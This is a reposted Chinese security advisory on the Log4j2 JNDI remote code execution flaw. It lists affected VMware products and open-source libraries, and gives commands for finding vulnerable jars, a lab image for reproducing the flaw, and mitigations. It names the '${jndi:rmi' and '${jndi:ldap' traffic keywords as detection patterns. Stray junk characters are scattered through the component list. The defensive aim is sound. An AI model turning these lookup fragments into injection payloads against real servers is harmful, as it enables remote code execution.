漏洞描述Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于该漏洞影响范围极广,建议广大用户及时排查相关漏洞,经过白帽汇安全研究院分析确认,目前市面有多款流行的系统都受影响。 该漏洞危害等级:严重 影响范围Apache Log4j 2.x < 2.15.0-rc2 已知影响组件- Apache Struts2
- Apache Solr
- Apache Flink
- Apache Druid
- flume
- dubbo
- logstash
- VMware Horizon
- VMware vCenter Server
- VMware HCX
- VMware NSX-T Data Center
- VMware Unified Access Gateway
- VMware WorkspaceOne Access
- VMware Identity Manager`
- VMware vRealize Operations
- VMware vRealize Operations Cloud Proxy
- VMware vRealize Log Insight
- VMware vRealize Automation
- VMware vRealize Lifecycle Manager
- VMware Telco Cloud Automation
- VMware Site Recovery Manager
- VMware Carbon Black Cloud Workload Appliance
- VMware Carbon Black EDR Server
- VMware Tanzu GemFire
- VMware Tanzu Greenplum
- VMware Tanzu Operations Manager
- VMware Tanzu Application Service for VMs
- VMware Tanzu Kubernetes Grid Integrated Edition
- VMware Tanzu Observability by Wavefront Nozzle
- Healthwatch for Tanzu Application Service
- Spring Cloud Services for VMware Tanzu
- Spring Cloud Gateway for VMware Tanzu
- Spring Cloud Gateway for Kubernetes
- API Portal for VMware Tanzu
- Single Sign-On for VMware Tanzu Application Service
- App Metrics
- VMware vCenter Cloud Gateway
- VMware Tanzu SQL with MySQL for VMs
- VMware vRealize Orchestrator
- VMware Cloud Foundation
- VMware Workspace ONE Access Connector
- VMware Horizon DaaS
- VMware Horizon Cloud Connector
$ g/ z7 u" a3 S) u' M- I5 h7 M
受影响开源组件项目 仓库地址 版本 ; C& I& U5 _& W$ ^/ B$ S( ?
elasticsearch(org.elasticsearch)https://github.com/elastic/elasticsearch8.0.0-alpha2 等(共 100 个). t& p4 B& b" t, ?6 l( ~
spring-webflux(org.springframework)https://github.com/spring-projects/spring-framework5.2.6.RELEASE 等(共 40 个)
. d- {3 z) g' Gdruid(com.alibaba)https://github.com/alibaba/druid1.2.8 等(共 68 个)
0 x7 w) _8 ~7 D) @! Y$ c7 ~hystrix-rx-netty-metrics-stream(com.netflix.hystrix)https://github.com/Netflix/Hystrix1.5.4 等(共 2 个), t! i$ P9 F2 |2 A
spring-cloud-starter-alibaba-sentinel(com.alibaba.cloud)https://github.com/alibaba/spring-cloud-alibaba2021.1 等(共 14 个)
+ `9 |& T9 n% Q. N; ~6 vspring-boot-starter-ahas-sentinel-client(com.alibaba.csp)https://github.com/alibaba/Sentinel1.3.2 等(共 17 个)1 o/ s( { U+ X/ i% _* r0 \0 m
redisson(org.redisson)https://github.com/redisson/redisson2.2.24 等(共 3 个)7 o8 ?" ?, C: c+ H8 ?/ w/ m6 r5 w8 a
HikariCP(com.zaxxer)https://github.com/brettwooldridge/HikariCP5.0.0 等(共 27 个)& F. p6 v" u! w/ o
zipkin-collector-service(io.zipkin)https://github.com/openzipkin/zipkin1.40.2 等(共 27 个)
6 a( m0 |# K; F9 G, u# Vmybatis-plus(com.baomidou)https://github.com/baomidou/mybatis-plus3.4.3.4 等(共 41 个)
5 _4 P0 H; C4 O6 ^; H8 izuul-sample(com.netflix.zuul)https://github.com/Netflix/zuul2.3.0 等(共 10 个)9 H' H4 W1 X- L+ o8 v4 p8 }# {% n
watson-data-api-client(com.ibm.watson.data)https://github.com/OpenAPITools/openapi-generator0.1 等(共 1 个)' @0 v( q" ~9 A( A1 v3 C0 B6 p( e( d
spring-boot-admin-sample-consul(de.codecentric)https://github.com/codecentric/spring-boot-admin2.5.4 等(共 40 个)
& B) F* c% q9 V2 h1 A; j9 _jedis(redis.clients)https://github.com/redis/jedisjedis-3.6.2 等(共 36 个)
2 A* v( H$ ` T5 [grpc-benchmarks(io.grpc)https://github.com/grpc/grpc-java1.9.1 等(共 65 个)
' y8 p: W: S% M4 J- fktor-client-json-tests(io.ktor)https://github.com/ktorio/ktor1.6.7 等(共 32 个)
( ~2 ~/ F4 K9 m2 agitbucket_2.13(io.github.gitbucket)https://github.com/gitbucket/gitbucket4.32.0 等(共 27 个)
4 t& ?( Q1 E7 q7 Q' cfinagle-zipkin_2.12(com.twitter)https://github.com/twitter/finagle7.1.0 等(共 56 个)
" o, z% ]# n' q+ A0 Iresilience4j-vertx(io.github.resilience4j)https://github.com/resilience4j/resilience4j0.9.0 等(共 9 个)
5 O3 D; J4 {. ~7 q: Pelasticsearch-sql(org.nlpcn)https://github.com/NLPchina/elasticsearch-sql6.8.13.0 等(共 9 个)
8 M7 \: v* b2 P3 z3 d' e `2 \exposed-spring-boot-starter(org.jetbrains.exposed)https://github.com/JetBrains/Exposed0.36.2 等(共 11 个)! ^' g3 x& Z2 }
blade-sql2o(com.bladejava)https://github.com/lets-blade/blade1.2.9 等(共 1 个)/ \0 c$ N+ g2 s O
netty-socketio(com.corundumstudio.socketio)https://github.com/mrniko/netty-socketio1.7.19 等(共 8 个). t3 T& l# s4 ]. q, ?3 g. ~
springfox-swagger2(io.springfox)https://github.com/springfox/springfox2.10.5 等(共 6 个)
/ ^$ P8 K; w* r. jmain_2.12(org.scala-sbt)https://github.com/sbt/sbt1.6.0-RC1 等(共 88 个)
u$ u; ? G! Zlettuce-core(io.lettuce)https://github.com/lettuce-io/lettuce-core6.1.5.RELEASE 等(共 42 个)6 ?! ^: m/ s5 j5 I
repository-azure(org.opensearch.plugin)https://github.com/opensearch-project/OpenSearch1.2.0 等(共 3 个)
6 p3 a+ u3 j* F N0 M+ A# I1 ]reactor-test(io.projectreactor)https://github.com/reactor/reactor-core3.3.4.RELEASE 等(共 3 个)$ P+ s' c; ?2 L0 e
corda-webserver-impl(net.corda)https://github.com/corda/cordacorda-3.0 等(共 32 个)
- E* ~+ b7 l7 Z+ ?conductor-redis-persistence(com.netflix.conductor)https://github.com/Netflix/conductor3.3.6 等(共 100 个)
]! G2 `& a" V* Qarmeria(com.linecorp.armeria)https://github.com/line/armeria0.26.1.Final 等(共 2 个): f8 q- V/ w- A8 G& S; z6 T
breeze-parent_2.13(org.scalanlp)https://github.com/scalanlp/breeze2.0.1-RC1 等(共 5 个)
. ?+ k6 m9 L k' s. g& i ~+ Omicrometer-core(io.micrometer)https://github.com/micrometer-metrics/micrometer1.8.1 等(共 98 个): y& E: M7 ^; u2 W' e
alink_connector_jdbc_sqlite_flink-1.9_2.11(com.alibaba.alink)https://github.com/alibaba/Alink1.5.1 等(共 3 个)
$ y5 n- @- u% tinitializr-actuator(io.spring.initializr)https://github.com/spring-io/initializr0.9.0 等(共 6 个)5 g- {- R% s5 R4 }6 F; D8 d
telegrambots-spring-boot-starter(org.telegram)https://github.com/rubenlagus/TelegramBots4.9.1 等(共 17 个): W" U) T% S- k+ D5 [
spring-data-elasticsearch(org.springframework.data)https://github.com/spring-projects/spring-data-elasticsearch4.3.0 等(共 86 个)5 A% ~* j y7 s7 i
feast-common(dev.feast)https://github.com/feast-dev/feast0.9.2 等(共 26 个)9 y# q4 S5 }" T- X8 `! y/ F( N, ?. R
javamelody-core(net.bull.javamelody)https://github.com/javamelody/javamelody1.88.0 等(共 13 个) F$ G7 j6 x( K2 c. u8 U
analytics-zoo-bigdl_0.13.0-spark_3.0.0(com.intel.analytics.zoo)https://github.com/intel-analytics/analytics-zoo0.11.0-RC1 等(共 4 个)" p: x: p' t7 p
scio-tensorflow_2.13(com.spotify)https://github.com/spotify/scio0.9.6 等(共 97 个)
8 D+ s' W1 P3 a, O; @grpc-client-spring-boot-autoconfigure(net.devh)https://github.com/yidongnan/grpc-spring-boot-starter2.9.0.RELEASE 等(共 16 个)
8 s; Q3 q! r+ m1 y0 binject-server_2.12(com.twitter)https://github.com/twitter/finatra21.9.0 等(共 56 个)0 p0 t k7 r: F( q- y
client-java-examples(io.kubernetes)https://github.com/kubernetes-client/java8.0.2 等(共 1 个)
- {4 C: J. T; l: t, e# W# d$ A. _reactivesocket-tck-drivers(io.reactivesocket)https://github.com/rsocket/rsocket-java0.6.0 等(共 1 个)
+ U7 x( \# c3 ^) o8 q- L2 \' f9 @jest-droid(io.searchbox)https://github.com/searchbox-io/Jest6.3.1 等(共 8 个)
/ ]/ N; q3 b) ^3 G5 O+ a3 J, o3 t- @graphql-dgs-example-java-webflux(com.netflix.graphql.dgs)https://github.com/Netflix/dgs-framework4.9.7 等(共 36 个)7 N& {* N3 F7 R2 t% j; U* u
quill-jdbc-monix_2.11(io.getquill)https://github.com/getquill/quill3.9.0 等(共 62 个), M" m9 r; i; ]+ k2 w( w7 j
doobie-quill_2.12(org.tpolecat)https://github.com/tpolecat/doobie1.0.0-RC1 等(共 61 个)
' P8 Z4 |4 W( z6 g! Vhttp4k(org.http4k)https://github.com/http4k/http4k4.3.4.1 等(共 3 个)4 m, h$ [, i( Z+ c
elasticsearch-hadoop(org.elasticsearch)https://github.com/elastic/elasticsearch-hadoop8.0.0-beta1 等(共 100 个)
1 I% K% t/ w& M; H0 l" i! msbt-shading(io.get-coursier)https://github.com/coursier/coursier1.0.0-RC8 等(共 1 个)
* C; Y8 M/ J: Nspark-cassandra-connector-unshaded_2.10(com.datastax.spark)https://github.com/datastax/spark-cassandra-connector2.0.9 等(共 54 个)5 Y9 ]! i7 X2 C% ^( ]
webdrivermanager(io.github.bonigarcia)https://github.com/bonigarcia/webdrivermanager4.0.0 等(共 15 个); ~+ l( X' G8 D
common-auth-v3(com.tencent.bk.devops.ci.common)https://github.com/Tencent/bk-ci1.2.0-rc.7-RELEASE 等(共 3 个)
7 ?1 n c: ?" T8 W0 p- O- freactor-netty(io.projectreactor.netty)https://github.com/reactor/reactor-netty1.0.9 等(共 75 个)
6 J. u% H6 R$ O6 yevcache-client-sample(com.netflix.evcache)https://github.com/Netflix/EVCache5.18.9 等(共 63 个)
$ h, s# ^) u' q8 K) q! ^xtdb-test(com.xtdb)https://github.com/xtdb/xtdb1.20.0 等(共 9 个)
& N" q7 I( @! x, g- j8 Vtransport-netty4(com.strapdata.elasticsearch.plugin)https://github.com/strapdata/elassandra6.2.3.31 等(共 14 个)
4 ^) S! I2 d4 ^2 p6 A) n7 V6 esbt-metals(org.scalameta)https://github.com/scalameta/metals0.9.9 等(共 17 个)- W8 Y1 }' y0 z5 d) A# V6 F4 j! A7 ?
elastic4s-embedded_2.12(com.sksamuel.elastic4s)https://github.com/sksamuel/elastic4s6.7.8 等(共 100 个)& d8 C* V2 ~* t" z* b/ E% t1 R3 ]
genie-agent(com.netflix.genie)https://github.com/Netflix/genie4.0.4 等(共 100 个)
; w) c2 K; L0 @# Q# U" \spring-kafka(org.springframework.kafka)https://github.com/spring-projects/spring-kafka2.7.9 等(共 79 个)8 I2 r1 [5 D- g, E) Q' c. M5 \% x( Z" }
db-async-common_2.13(com.dripower)https://github.com/mauricio/postgresql-async0.3.109 等(共 19 个)
# t2 I4 ^+ H2 f3 C! C( ]. p7 nselenide(com.codeborne)https://github.com/selenide/selenide5.25.0-selenium-4.0.0-rc-2 等(共 18 个)9 h3 N7 q$ X3 p2 f' o5 P$ V
cloudfoundry-identity-server(org.cloudfoundry.identity)https://github.com/cloudfoundry/uaa4.30.0 等(共 1 个)
9 g6 j& O; v2 P- ^9 l" Aservo-atlas(com.netflix.servo)https://github.com/Netflix/servo0.13.2 等(共 20 个)* E C# o2 J+ R. }7 y) t) @+ r% ]! C
rxnetty-spectator-tcp(io.reactivex)https://github.com/ReactiveX/RxNetty0.5.3-rc.4 等(共 12 个)
( l p5 [6 v h6 _! C3 u- z Wmleap-tensorflow_2.10(ml.combust.mleap)https://github.com/combust/mleap0.9.6 等(共 25 个)) p- g i p4 s0 e
spark-testing-base_2.12(com.holdenkarau)https://github.com/holdenk/spark-testing-base2.4.4_1.1.1 等(共 100 个) o# k5 p7 B* e2 ~: F3 v
graphql-kotlin-spring-client(com.expediagroup)https://github.com/ExpediaGroup/graphql-kotlin5.0.0-alpha.0 等(共 20 个)
' z& U- ]0 u- s0 E' `graphql-spring-boot-test-autoconfigure(com.graphql-java-kickstart)https://github.com/graphql-java-kickstart/graphql-spring-boot8.1.1 等(共 33 个)
" ~% m) j" j3 }' a7 a9 {6 Pdiscord4j-rest(com.discord4j)https://github.com/Discord4J/Discord4J3.2.1 等(共 15 个) J5 e/ ~: u2 u7 U
twitter-server-logback-classic_2.13(com.twitter)https://github.com/twitter/twitter-server21.9.0 等(共 54 个)
) e& P% `4 H2 k! Asynthea(org.mitre.synthea)https://github.com/synthetichealth/synthea2.7.0 等(共 2 个)3 a$ W P/ V4 {8 F
spring-integration-redis(org.springframework.integration)https://github.com/spring-projects/spring-integration5.5.6 等(共 30 个)
) L, Z2 [" X2 e# O& _% gcyclops-reactor-integration(com.oath.cyclops)https://github.com/aol/cyclops10.4.0 等(共 1 个)3 p& c( t% j1 K6 r6 c/ C) K
akka-stream-alpakka-geode_2.12(com.lightbend.akka)https://github.com/akka/alpakka1.0-M1 等(共 13 个)* o. ]9 K) b+ J* V0 ?
mantis-client(io.mantisrx)https://github.com/Netflix/mantis1.3.9 等(共 83 个)
& }* l0 y8 ?/ _3 Fmybatis-generator-plugin(com.itfsw)https://github.com/itfsw/mybatis-generator-plugin1.2.9 等(共 31 个)
3 I- i, f8 U) \, ~% qktorm-support-sqlserver(org.ktorm)https://github.com/kotlin-orm/ktorm3.3.0 等(共 11 个)
/ ?; H& j Z# W7 Z* |+ K2 w+ kgatk(org.broadinstitute)https://github.com/broadinstitute/gatk4.beta.2 等(共 39 个)# _& X8 V" _9 R# k9 f7 A9 p1 X
azure-messaging-servicebus(com.azure)https://github.com/Azure/azure-sdk-for-java7.5.1 等(共 100 个)
0 x5 @/ G4 @3 ^' C) cmica-metrics(net.dreamlu)https://github.com/lets-mica/mica2.5.7 等(共 7 个)
! j: Z! o$ d) w; }shiro-redis(org.crazycake)https://github.com/alexxiyang/shiro-redis3.3.1 等(共 2 个)6 B" k2 Z# W; ~. h. {
enumeratum-play_2.12(com.beachape)https://github.com/lloydmeta/enumeratum1.5.16 等(共 2 个)% }% ?; a7 Y2 v/ V) |: p
jdonframework(org.jdon)https://github.com/banq/jdonframework6.6.8 等(共 1 个)& \8 I! |1 {8 y4 `" X) k0 Q! ^3 F! Z
weid-java-sdk(com.webank)https://github.com/WeBankBlockchain/WeIdentity1.8.1 等(共 3 个)# b- Z; }: w7 M/ h) K
log-protocol(io.shulie.pradar)https://github.com/shulieTech/Takin2.0.3 等(共 3 个)
f$ j4 j1 F7 y4 z2 ]( ~micro-boot(com.oath.microservices)https://github.com/aol/micro-server1.2.6 等(共 38 个)
4 y' T9 D5 T) s( G' E a8 rsparkling-water-package_2.11(ai.h2o)https://github.com/h2oai/sparkling-water2.4.10 等(共 36 个)
2 a5 I; r+ T* u; Z1 zscalatest_2.13(au.com.dius.pact.provider)https://github.com/pact-foundation/pact-jvm4.2.4 等(共 5 个)
" L9 m! A6 H0 p2 D5 s/ ^1 \" pmssql-jdbc(com.microsoft.sqlserver)https://github.com/microsoft/mssql-jdbc8.3.0.jre11-preview 等(共 100 个)
; \' j7 x C; M4 C8 S8 F4 melide-spring-boot-starter(com.yahoo.elide)https://github.com/yahoo/elide6.0.3 等(共 45 个)
6 K# _* @: R% D4 u9 K5 ykafka-connect-elastic5(com.datamountaineer)https://github.com/lensesio/stream-reactor1.2.0 等(共 5 个)
1 a c4 |4 |: G; Zkvision-server-spring-boot-jvm(io.kvision)https://github.com/rjaros/kvision5.4.3 等(共 9 个), c6 r! b8 s9 y# z2 p0 ?
r2dbc-postgresql(org.postgresql)https://github.com/pgjdbc/r2dbc-postgresql0.9.0.RC1 等(共 8 个)6 F: U2 Y$ _% b
play-slick-evolutions_2.13(com.typesafe.play)https://github.com/playframework/play-slick5.0.0-RC3 等(共 29 个) n" b* i8 p/ d5 f9 o. \
sbt-bloop-core(ch.epfl.scala)https://github.com/scalacenter/bloop1.4.8-43-c2d941d9 等(共 29 个)$ A; H0 B: F% Y+ r
jcseg-elasticsearch(org.lionsoul)https://github.com/lionsoul2014/jcseg2.6.2 等(共 7 个)更多受影响组件查询,请点击以下链接查询:https://log4j2.huoxian.cn/ 漏洞排查代码排查:查看 pom.xml 是否引入 org.apache.logging.log4j、org.apache.logging.log4j2 ![]()
Linux: sudo find / -name "*log4j-*.jar"![]()
Windows: *log4j*.jar![]()
攻击排查日志排查: 攻击者在利用前通常采用dnslog方式进行扫描、探测,对于常见利用方式可通过应用系统报错日志中的 "javax.naming.CommunicationException" "javax.naming.NamingException: problem generating object using object factory" "Error looking up JNDI resource"关键字进行排查。 流量排查: 攻击者的数据包中可能存在:“${jndi:rmi”、“${jndi:ldap”字样,可根据此类关键字进行排查。 漏洞复现![]()
Vulfocus 靶场环境目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试: http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c 也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行,本地启动命令:docker run -d -P vulfocus/log4j2-rce-2021-12-09:latest ![]()
修复建议1、禁止使用 log4j 服务器外连,升级 idk 11.0.1 8u191 7u201 6u211 或更高版本。 2、升级至 log4j-2.15.0-rc2: 下载地址:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2 3、紧急缓解措施: (1) 修改 jvm 参数 -Dlog4j2.formatMsgNoLookups=true (2) 修改配置 log4j2.formatMsgNoLookups=True (3) 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置 为 true 参考[1] https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1 [2] [LOG4J2-3201] Limit the protocols jNDI can use and restrict LDAP. - ASF JIRA (apache.org) [3] ASF Git Repos - logging-log4j2.git/blob - log4j-core/src/test/java/org/apache/logging/log4j/core/lookup/JndiRestrictedLookupTest.java [4] https://mp.weixin.qq.com/s/wC7mrK1Y4DYz9_yW4fLzbw [5] https://help.aliyun.com/noticelist/articleid/1060971232.html [6] https://mp.weixin.qq.com/s/C4zeXHKHDqPeRuLytO7Fzw 4 U9 ?$ |2 _' Y' M, Q; U
via https://nosec.org/home/detail/4917.html
8 ?. f$ t1 v+ U4 z" U( [3 ? | 
/1 
IP卡
狗仔卡
发表于 2021-12-15 10:10:25
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡